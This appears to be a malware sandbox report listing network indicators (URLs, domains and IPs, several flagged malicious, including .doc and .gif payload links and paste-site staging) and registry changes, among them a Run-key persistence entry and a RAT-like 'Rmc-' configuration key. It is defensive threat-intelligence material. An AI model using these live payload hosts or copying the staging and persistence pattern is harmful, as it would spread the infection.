http://107.175.242.96/9020/beautifulrosepictureforcuple.gif
107.175.242.96
 malicious
https://uploaddeimagens.com.br/images/00
unknown
 malicious
107.172.31.178
malicious
https://uploaddeimagens.com.br
unknown
 malicious
http://107.175.242.96/9020/KBO/beautifulroseipictureiseenitsshowingasabeautifulflowerwhichcomingfromtheworldanditsshowinghowbeautiful___sheiswhenthatroseonhairbeautiful.doc
107.175.242.96
 malicious
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
172.67.215.45
 malicious
https://duckduckgo.com/chrome_newtab
unknown
https://paste.ee/d/0FQ71
104.21.84.67
http://www.imvu.comr
unknown
https://duckduckgo.com/ac/?q=
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://www.imvu.com/HK
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGM3czrEGIjA-kmni6OpCb0sK0OJXQ-xgahRJhOOfp9sjhLJd6-GVaRKXjhN1j2AjiNvlTeHQJ0kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
https://www.google.com
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKXdzrEGIjB41r-JEwv8u4RzZMcO3uf3_AVoLOwrfZ1qWrP1Y7YHnyIzpJ09Xc86C2JU0Bi2aeUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGK7dzrEGIjDq-mFFkbgFVaqY36H785yGShiPXuv9YMW_Y12o7PZkmsAwZQOjvC-0xZLraM2rZywyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://nuget.org/nuget.exe
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGOzdzrEGIjD4BYm6o4hKCYiqPjxXvkfZ2ovXRpRUm6SnG4gMqKAQ4dBvO8srgL5uNXO3jWFzVVcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
https://cdnjs.cloudflare.com
unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
172.217.1.4
https://cdnjs.cloudflare.com;
unknown
http://www.nirsoft.net/
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKPezrEGIjCsnXwudwDFqZVXvPrN4Rob7Uu6w6Tk7hmROQ1W_bSdQYUdlOKA93zBi4dQB7GohcYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.google.com/chrome/whats-new/m109?internal=true
172.217.1.4
http://107.175.242.96/9020/beautifulrosepictureforcuple.gifj
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKPezrEGIjB8ma4QuYTZNgTcsXoznRrMlKWcGC6U5UXRLLGhWy8cGILU-cp1VshwnRzJEnE8yEEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://www.nirsoft.net(
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGK7dzrEGIjB-lB3Hfh_-grAroUfQ4ulZayQnQ3jYD8g4ouSleSBRPOPVtIe6ARSkXUqQqBbXlGMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGK7dzrEGIjAgKvCcnwg6hTnJngfc9eaYgHGDI79MptO06svH8vUkRmA0qhByG2uNJZTJErrbtzMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://pop.tg/D1
unknown
https://www.google.com;
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx64
unknown
https://contextual.media.net/
unknown
https://www.ecosia.org/newtab/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
unknown
http://pop.tg/
unknown
http://www.msn.com/
unknown
http://www.imvu.com/RK
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGNXdzrEGIjD1MJOBAZ8nZtfVYeKIBfX03XxbdgYCqeCJ1ArvmL45jK3mHxtysW1beDmZztvCZw0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGP3czrEGIjAXIG4uWsMc1yHwGtbWnQ4BrBFLGzkrT3CpFRrCGx74-yixjHV6JAEPUuq6MDX-WosyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://pop.tg/D1ae4V
unknown
https://analytics.paste.ee;
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGIndzrEGIjAWPrWKos41NT4kmtwOzV0So1qqWn5ONKLkds_6fO99Z83kO0tED8KmXN17uSmsMb4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
https://www.google.com/accounts/servicelogin
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGNXdzrEGIjDeVoNnGK_GApW0nItKIOjxmbXH37fH625ketxhzwrf8wZW5xn9h04112noRcT8ufgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGPrdzrEGIjD62BF9VLil3q7TBHlgAoNwZbQ57mjRTqpirCuZCcht2cAGpDc-noXcoTbNMkmgGOcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGOzdzrEGIjCfBvE4KZSZqQDo_mkN-yIUb4l04OpYUnN-_hx9hfvdk99ntwcCm2FPKZvYcHn8Q8IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKPezrEGIjABKxFQJzBLGls7WBQxFnozyFcUzn392-T_NeJPX_-UAx8xrieHN30kYw1dxFVn4hoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://www.msn.com/advertisement.ad.js
unknown
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGIndzrEGIjB0ZZgq5v5iPP5i9AevO7TxIMVCQ7xcfFi2Nbu1H-ak-I-R3dc52fJoY_ZFhpfWqjwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
https://analytics.paste.ee
unknown
https://pastcretinizar.cretinizarcretinizar/d/0FQ71lc
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGOzdzrEGIjCKF70bFjbPy54pl9_7pZMp1HqF5_Gw5IhtTtRMmmIqlnyFWm5JdONgkFudsvQHPE4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGP3czrEGIjBmWrrWv04dQi66TiEKCyc8WmpF7SUcXBS_pm4LOE_wEtYKIhHCHVOYQHcKb14RilQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
https://pastcretinizar.cretinizarcretinizar/d/0FQ71
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPrdzrEGIjBSZezThE0VlB5syruPfQ0MF7f9-btF8DEU_uZA1mJxV0vvucs3pOniQyrvmvmqITgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
172.217.1.4
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
https://contoso.com/
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
https://paste.ee/
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://ocsp.entrust.net0D
unknown
https://secure.gravatar.com
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
uploaddeimagens.com.br
172.67.215.45
 malicious
pop.tg
172.67.206.230
 malicious
google.com
142.251.41.78
paste.ee
104.21.84.67
geoplugin.net
178.237.33.50
www.google.com
172.217.1.4

IPs

IP
Domain
Country
Malicious
107.172.31.178
unknown
United States
malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious
172.67.206.230
pop.tg
United States
malicious
107.175.242.96
unknown
United States
malicious
104.21.84.67
paste.ee
United States
172.217.1.4
www.google.com
United States
192.168.2.5
unknown
unknown
239.255.255.250
unknown
Reserved
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Path
 malicious
HKEY_CURRENT_USER\Software\Rmc-NVSJ5U
exepath
 malicious
HKEY_CURRENT_USER\Software\Rmc-NVSJ5U
licence
 malicious
HKEY_CURRENT_USER\Software\Rmc-NVSJ5U
time
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
>9+
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
&?+
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
a3+
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
m4+
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://pop.tg/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
-4+
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\367B8
367B8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
